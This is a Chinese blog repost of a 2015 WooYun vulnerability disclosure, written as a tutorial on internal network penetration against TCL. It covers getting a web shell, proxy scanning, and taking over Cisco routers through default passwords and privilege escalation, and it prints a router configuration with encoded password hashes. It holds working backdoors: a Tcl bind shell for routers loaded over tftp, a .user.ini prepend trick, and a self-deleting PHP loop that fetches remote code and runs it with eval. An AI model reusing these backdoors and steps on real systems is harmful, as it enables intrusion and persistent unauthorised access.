内网渗透学习

在乌云看到了这篇文章,看的我太爽了。

从TCL某漏洞看内网渗透教学分享之内网信息探测和后渗透准备 

披露状态:

2015-02-18: 细节已通知厂商并且等待厂商处理中
2015-02-27: 厂商已经确认,细节仅向厂商公开
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-04: 细节向公众公开

简要描述:

本来打算发人人网的,但是苦逼的是我刚进去内网就貌似被t出来了,服务器直接宕了,等下次案例发人人或者其他厂商吧

在内网渗透中,内网信息探测对你的渗透工作开展是否顺利至关重要,如果你能摸清楚目标内网的信息,就像开启了god mode
这个案例中,我们介绍几个基本的内网探测的手法,以及如何在实战中串联十八般武艺,获取这个god mode

详细说明:

常规的,从web业务撕开口子

url:bit.tcl.com

getshell很简单,phpcms的,一个Phpcms V9 uc api SQL的老洞直接getshell,拿到shell,权限很高,system

看看网卡信息

只有一块网卡,处于10.4.22的私网地址

在这里,如果我们想要通过这台机器对内网进行渗透,首要工作就是进行内网探测,介绍几个方法

0x00如果你只是需要对内网的业务主机进行渗透,那么可以优先查看一下hosts,针对hosts中的主机针对性渗透

0x01如果想要对整个C段主机进行渗透,比较完整方便的方法还是扫描,这里就需要我们进行内网代理,然后扫描

正向代理or反向代理,因为此处主机无法通外网,所以我们选择正向代理

一个我常用的代理reGeorg

https://github.com/sensepost/reGeorg

上传代理脚本,然后用regerog尽心代理链接(regeorg需要urllib3,所以各位需要用到时,先安装这个模块)

用nmap等进行代理扫描,很简单可以使用proxychains或者win 下使用proxycap

因为我们这里指定的端口时2333,所以修改一下proxychains的conf

以此来尽心内网C段的信息探测

0x02当然,仅仅通过扫描,并不能获取到最全面的信息,最全面的信息,要么就是我们拿到了内网拓扑,或者,我直接日下了路由器

路由器,走你~

通过之前的nmap扫描,我们大概知道了开放web服务的主机

访问11,12,13三台主机后,发现时cisco的路由器,且是开放web管理的cisco路由器,默认密码cisco成功进入

开放web管理的思科路由是可以在web端执行命令的,但是我们的路由权限只是1,cisco的权限分级大概是这样:

管理员是7 ,但是有15个权限分级,15的权限基本属于为所欲为权限

在这里,因为看到当前路由ios版本号是

低版本的iOS可以利用我之前的一个老洞进行cisco路由提权

因为在web端,可以用privilege15进行命令操作

这样我们就拥有了一个privilege15的用户,赶紧telnet进路由看看配置,一定会有惊喜

看到我们确实拿到了privilege15的用户

那么,来瞅瞅路由配置吧

code 区域

DZSW-3560-A#en
en
DZSW-3560-A#show running-config
show running-config
Building configuration...

Current configuration : 3678 bytes
!
version 12.2
no service pad
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname DZSW-3560-A
!
enable password 7 121A0C041104
!
username admin privilege 15 password 7 1543595F507F7D
no aaa new-model
system mtu routing 1500
vtp mode transparent
ip subnet-zero
ip routing
!
!
!
!
 --More--
!
!
no file verify auto
spanning-tree mode pvst
spanning-tree extend system-id
!
vlan internal allocation policy ascending
!
vlan 218
 name Call_Center
!
vlan 220
!
vlan 222
 name WEB
!
vlan 223
 name DB
!
!
interface Port-channel1
 switchport trunk encapsulation dot1q
 switchport mode trunk
!
interface Port-channel2
 description Connect_To_YDBFZX-C3750_Po1
 no switchport
 ip address 10.68.3.2 255.255.255.252
!
interface GigabitEthernet0/1
 switchport access vlan 218
 switchport mode access
!
interface GigabitEthernet0/2
 switchport access vlan 222
 switchport mode access
!
interface GigabitEthernet0/3
 switchport access vlan 222
 switchport mode access
!
interface GigabitEthernet0/4
 switchport access vlan 222
 switchport mode access
!
interface GigabitEthernet0/5
 switchport access vlan 222
 switchport mode access
!
interface GigabitEthernet0/6
 switchport access vlan 222
 switchport mode access
!
interface GigabitEthernet0/7
 switchport access vlan 222
 switchport mode access
!
interface GigabitEthernet0/8
 switchport access vlan 222
 switchport mode access
!
interface GigabitEthernet0/9
 switchport access vlan 222
 switchport mode access
!
interface GigabitEthernet0/10
 switchport access vlan 222
 switchport mode access
!

几个业务,DB,办公的vlan跃然于眼前,当前我们实在web vlan的

其他两台路由也一样到玩法

===================分割线==================

那么有的同学就问了,如果我不满足于在web vlan闹腾,如果我作为一个黑阔,我要去办公vlan去耍怎么办,哟西~既然我们都已经控制了路由啦,当然可以去闹!

因为我不是运维狗,所以咨询了z8大屌,他告诉我,少年,你听过GRE隧道么,诶嘿~

code 区域

GRE 是一种最传统的隧道协议,其根本功能就是要实现隧道功能,通过隧道连接的两个远程网络就如同直连,GRE在两个远程网络之间模拟出直连链路,从而使网络间 达到直连的效果

http://itchenyi.blog.51cto.com/4745638/1137143

http://www.codesky.net/article/201207/171461.html

大家可以参考这两个地方

通过GRE隧道配置,我们就可以跑到另外一个vlan去闹了~

(做人留一线,日后好相见,就不截图call_center的vlan了,渗透其网段的思路也和之前介绍的一样)

=========分割线==============

那么又有同学举手了,如果我渗透的目标无法短时间内就完成,需要进行后渗透,我怎么样才能让我之后的渗透也方便呢?

好的,同学你很猥琐,这里介绍几个平时我们工作中常用的留后门多法子

首先,这个cisco的路由后门,我们肯定要优先留一个

cisco路由器支持TCL cisco脚本,所以我们的后门也通过这个来完成

code 区域

# TclShell.tcl v0.1 by Andy Davis, IRM 2007

#

# IRM accepts no responsibility for the misuse of this code

# It is provided for demonstration purposes only

proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " "
puts $sock "---|---|---|---|---|---|---|---|---|---|---|---|-"
puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"
puts $sock "---|---|---|---|---|---|---|---|---|---|---|---|-"
puts $sock " "
set response [exec "sh ver | inc IOS"]
puts $sock $response
set response [exec "sh priv"]
puts $sock $response
puts $sock " "
puts $sock "Enter IOS command:"
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
}
}
set port 1234
set sh [socket -server callback $port]
vwait var
close $sh

这是老外写的一个后门,先在路由中开启tclsh模式,然后引入后门脚本

Router#tclsh

Router(tcl)#source tftp://x.x.x.x/backdoor.tcl

这样我们就留下来后门,下次链接可以直接在网段内的机器直接

nc 路由ip 1234(端口在后门脚本中修改)

ok,如果web的入口断了,这一切都白搭,所以我们还应该对web的机器留下比较隐藏的后门

说两个,一个是文件形的后门

这个办法之前phinthon老师已经说过了,就是通过php.ini或者user.ini留后门

在一个有正常php文件的目录下新建一个.user.ini

内容为

auto_prepend_file=xxx.gif(png/jpg)之类

而你的xxx.gif之类就是你的后门

具体可以参考http://drops.wooyun.org/tips/3424

第二个办法,非文件形的后门,这样的后门优势在于非常隐蔽,一般的网管都发现不了,但是有一个非常大的缺点,重启,或者进程中断后门就消失了

原理大概是:后门的代码第一行删除自身,然后驻留在后台内存里,等待外部链接

code 区域

<?php
unlink($_SERVER[‘SCRIPT_FILENAME‘]);
ignore_user_abort(true);
set_time_limit(0);

$remote_file = ‘http://xxx/xxx.txt‘;
while($code = file_get_contents($remote_file)){
  @eval($code);
  sleep(5);
};
?>

在xxx.txt中写入你的后门代码,访问后就会删除自己并循环执行txt的代码,这是之前某人写过的了

ztz最近有写了一个更赞的无文件后门,你们快去找他要

除了这样的,如果主机是linux,也可以用前段时间猪猪侠说的crontab做后门

漏洞证明:

我们来大概总结一下这次渗透,首先通过外部业务撕开入口,通过代理的方式对内网进行探测,发现了cisco路由,于是利用之前的漏洞进行提权,搞定了路由器,整个vlan划分展露无遗,开启god mode

因为我们这里是概念性的测试,所以尺度不能太大,但是,如果我是一个黑客,我接下来会做的事儿:

利用tunna转发3389出外网链接(但是在这个场景中,出外网限制了部分端口,但是可以查询dns,我们应该利用端口复用的方式),远程桌面后扩大战果(嗅探其他机器)

读数据库我们看到了很多tcl的员工用户数据,可以直接对tcl的企业邮箱直接撞裤攻击

因为路由器搞定了,跨vlan到另外的段,继续进行渗透

概念性证明图:

修复方案:

修复主要看这么几个地方:

外部业务,及时打补丁,控制权限

内网弱口令问题

内网主机及时补丁

路由器及时升级

你们的OPS后台还存在测试用户登陆的问题,此处的漏洞说明就不截图了

版权声明:转载请注明来源 redrain有节操@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-27 15:45

厂商回复:

非常感谢您的反馈,我们将会联系酷友公司进行相应的调整。

时间: 2024-10-12 13:03:32

内网渗透学习的相关文章

内网渗透思路

Sky's自留地 关注互联网安全,关注安全&攻击技术. 搜索关键字搜索 首页申请链接 内网渗透测试思路[转自网络] 作者: sky 孵化于: March 15, 2015 家属: 学习类,技术类 访问: 2,136 次 写在前面渗透测试是门技术,也是一门艺术.这门技术(艺术)一开始也不是每个人都会的,正所谓没有人一出生就会走路,从不懂到入门到深谙,一步步慢慢来,每个人都是这样:但是在这个过程中,思路无疑是最重要的,没有做不到只有想不到,就跟咱们高中解题时有了思路就迎刃而解一样,手里拿着铲子(技巧

内网渗透测试思路-FREEBUF

(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接,针对linux想办法使用反弹shell来本地连接. ① Webshell应该都可以调用系统cmd执行一些简单的命令,那么whoami(查看当前权限),netuser(查看用户/组),systeminfo(查看系统补丁修复情况)等常见命令应该是首先被执行 探测的. I: 不具备系统权限: ①  Ser

内网渗透+基础+工具使用=自己理解

目录 1.代理 2.内网命令 3.抓密码 4.ipc$共享目录利用 5.端口漏洞 6.溢出 1.代理 端口转发工具有很多比如:rebind2  eDuh  ssock  reDuh  lcx  socks5 等--.. 下面介绍我比较喜欢的2款工具LCX+ socks5 1.lcx 路由器加端口 TCP协议 ,固定IP地址本机 大马设置 Local Ip : 转发ip Local Port : 转发端口 Remote Ip :本机ip (ip138.com外网ip) Remote Port :

记录一次坎坷的linux内网渗透过程瞎折腾的坑

写在前面 每个人都有自己的思路和技巧,以前遇到一些linux的环境.这次找来一个站点来进行内网,写下自己的想法 目标环境 1.linux  2.6.32-358  cpu 架构(x86_64)AND发行版 Red Hat Enterprise Linux Server release 6.4 2.DMZ+防火墙+行为监控,外网开放8080 8084 ... 3.服务器有utibadn用户的权限一枚 Shell具体怎么拿到的就不说了,记录下自己比较思路坎坷的一次内网渗透以作回顾: 外网nmap得到

安天实战课题研究2017年第二期内网渗透技术题目

安天实战课题研究2017年第二期内网渗透技术题目拟研究以下题目:1.使用NTScan扫描内网Windows口令(已经完成)2.使用Hscan进行内网口令扫描 (已经完成)3.扫描Mysql口令 (已经完成)4.扫描MSSQL口令 (已经完成)5.使用SQLTools查看SQL Server数据库及提权 (已经完成)6.内网信息收集工具7.内网信息自动收集脚本8.内网密码获取工具9.服务器明文密码及hash获取10.Windows及Linux密码哈希破解11.远程终端使用攻略 (已经完成)12.记

浅谈内网渗透

引子离上篇文章的时间过去很久了,答应写一篇内网渗透的文章,今天抽点时间,把这个坑给添平了吧.标题是浅谈,所以我不认为自己能在内网渗透写的有多深入.渗透这玩意更多是经验,积累的多了自然水到渠成.而且我个人认为很多前辈人物都已经写的很好了,我这里纯粹抛砖引玉,把前辈级人物的经验集成在一起,也算基础篇吧.如果有不足的地方或者有更好的实现方法,欢迎随时交流.交流方式就以邮件吧,邮件地址在文章结束处,上次公开的Q加了很多人,即时通讯=即时打扰,过段时间集中清理,如果不小心被清理了,诸位勿怪,这里算是提前打

内网渗透常用手法

作者:凋凌玫瑰来源:NCPH 内网,很多人应该形成了这个概念,很多大型网络的外部网站或是服务器不一定有用,当然外网也是一个突破口.很多时候我们直接从外网入手,随着安 全的不断加固,已变得越来越困难.那么黑客通常是怎么进行内网渗透的,内网渗透又是怎样与社会工程学联系起来呢,今天主要描述黑客内网渗透的常用操作手 法,关于如何获得内网机器,请查找我以前的一篇文章<内网渗透—如何打开突破口>. 渗透的过程就是一个信息刺探.利用.思考.突破的过程.首先在我们获得一台内网的机器后应该怎么做,当然是信息刺探

(原创)校园卡破解系列三(完结篇)---内网渗透

上午大课间十几分钟搞定! 在班上电脑  因为内网渗透 先看看本地ip  172.18.33.38 然后就想着扫一下网段  随手输了172.18.32.0-172.18.33.0 扫内网端口的工具挺多的  最顺手其实是kali里面用msf一个模块扫 那个能直接爆破一些端口 但是考虑到班上电脑xp的辣鸡机子 而且时间不允许 所以直接写个php来扫内网端口也就是如图的 13.php 下载个phpstudy+这个文件  5分钟搞定 扫完就第一眼看到 172.18.32.5开了个8000端口  下意识猜测

内网渗透基础:内网、域、工作组、域控概念介绍

一.什么是内网 局域网(Local Area Network, LAN),又称内网,是指在某一区域内由多台计算机互联成的计算机组. 局域网可以实现文件管理.应用软件共享.打印机共享.扫描仪共享.工作组内的日程安排.电子邮件和传真通信服务等功能.局域网严格意义上是封闭型的.它可以由办公室内几台甚至上千台计算机组成.决定局域网的主要技术要素为:网络拓扑,传输介质与介质访问控制方法. 局域网标准定义了传输媒介.编码和介质访问等底层(一二层)功能.要使数据通过复杂的网络结构传输到达目的地,还需要具有寻址